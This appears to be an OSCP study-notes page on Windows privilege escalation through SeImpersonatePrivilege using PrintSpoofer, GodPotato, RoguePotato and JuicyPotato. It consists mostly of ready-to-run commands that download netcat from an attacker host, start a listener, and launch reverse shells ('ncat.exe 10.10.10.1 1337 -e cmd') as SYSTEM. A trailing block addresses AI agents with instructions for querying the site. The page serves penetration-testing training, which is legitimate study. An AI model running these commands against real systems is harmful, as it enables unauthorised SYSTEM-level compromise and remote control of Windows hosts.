# SeImpersonatePrivilege Exploit * Check Your Privileges: First and foremost, verify that your current user context has either `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege`. * Is the Print Spooler Running? Use `sc query spooler` to check the status of the Print Spooler service. If it's running, PrintSpoofer is often your most direct route to SYSTEM. * Assess the Windows Version: * Modern & Patched (Windows 10/11, Server 2019/2022): * Start with God Potato or its variants. Its reliance on a different vulnerability makes it highly effective. * If that fails, try Rogue Potato, which is specifically designed for these newer operating systems. * Juicy Potato NG / Sweet Potato are also strong contenders here, as they are designed for modern systems. * Older Systems (Windows 7, 8, 10 pre-1809, Server 2008-2016): * Juicy Potato is a solid and reliable choice. Its flexibility with CLSIDs makes it a favorite. * If for some reason Juicy Potato doesn't work, you can fall back to the original Rotten Potato. * Consider the Environment: In some highly restricted environments, outbound DCOM traffic might be blocked, or certain services may be disabled. If one Potato fails, don't hesitate to try another, as they leverage different communication channels and services. ```powershell whoami /priv nv -lnvp 1337 \#DOWNLOAD NCAT FROM ATTACKER \#32bit iwr -uri "http://10.10.10.1:8888/nc.exe" -Outfile ncat.exe \#64bit iwr -uri "http://10.10.10.1:8888/nc64.exe" -Outfile ncat.exe ---------------------------------------------------------------- \#PRINT SPOOFER iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe" -OutFile PrintSpoofer.exe iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -OutFile PrintSpoofer.exe .\PrintSpoofer.exe -c "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd" ---------------------------------------------------------------- \#Get .Net Version req query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP" \#GODPOTATO-NET iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -OutFile GodPotato.exe iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -OutFile GodPotato.exe iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -OutFile GodPotato.exe .\GodPotato.exe -c "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd" #ROQUE POTATO https://github.com/antonioCoco/RoguePotato # Network redirector / port forwarder to run on your remote machine, must use port 135 as src port socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999 # RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. # Use this if you have fw restrictions. RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" # RoguePotato all in one with RogueOxidResolver running locally on port 9999 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 #RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode #JUICY POTATO https://github.com/ohpe/juicy-potato https://github.com/mishmashclone/swisskyrepo-PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 #ROTTEN POTATO https://github.com/breenmachine/RottenPotatoNG ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp-notes-2025.gitbook.io/oscp+-notes-2025/windows-privesc/seimpersonateprivilege-exploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.